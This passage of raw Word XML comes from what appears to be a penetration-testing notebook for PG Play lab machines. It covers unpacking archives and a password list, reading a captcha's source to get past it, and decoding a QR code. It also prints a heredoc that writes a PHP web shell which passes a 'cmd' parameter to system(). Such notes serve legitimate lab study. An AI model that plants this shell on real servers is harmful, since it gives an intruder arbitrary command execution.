        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you look up the error "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">need PK compat. v5.1 (can do v4.6),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" you should see that we should use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003751">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003752">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7z x sitebackup3.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003753">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x stands for extract</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003754">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003757">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kypfxe1hnmmv" w:id="498"/>
      <w:bookmarkEnd w:id="498"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gzip (.gz)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003758">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003759">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a .gz file, then you can unzip it using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip nameOfFile.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will remove the .gz file and replace it with the unzipped contents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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5E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mkkl4gqdgfky" w:id="499"/>
      <w:bookmarkEnd w:id="499"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bz2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003760">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bunzip2 500-worst-passwords.txt.bz2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003761">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003762">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500-worst-passwords.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and deletes the original zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003765">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z8l86ky0406h" w:id="500"/>
      <w:bookmarkEnd w:id="500"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Captcha </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003766">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003767">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1172">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had a register page with a captcha. But the captcha wouldn't work, possibly on purpose. Like it wouldn't show up on the screen. So, the way to get around this, was to look at the source code, find captcha.php (or something similar), then click on it, and then it will lead you to the captcha.php page, where the code will be displated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003768">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003769">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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6D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nkugwkj8jiiw" w:id="501"/>
      <w:bookmarkEnd w:id="501"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">QR Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1173">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw a QR code which was a PNG. We used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zbarimg </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to scan it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003770">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="729"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zbarimg &lt;image file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003771">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003772">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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74">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4i2txbze0ja7" w:id="502"/>
      <w:bookmarkEnd w:id="502"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add multiple lines into file using a single echo command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003775">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003776">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat &lt;&lt;'EOF' &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003777">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003778">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003779">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form method="GET" name="&lt;?php echo basename($_SERVER['PHP_SELF']); ?&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="TEXT" name="cmd" autofocus id="cmd" size="80"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="SUBMIT" value="Execute"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    if(isset($_GET['cmd']))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003780">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003781">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        system($_GET['cmd'] . ' 2&gt;&amp;1');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003782">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003783">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003784">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003785">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003786">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003787">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
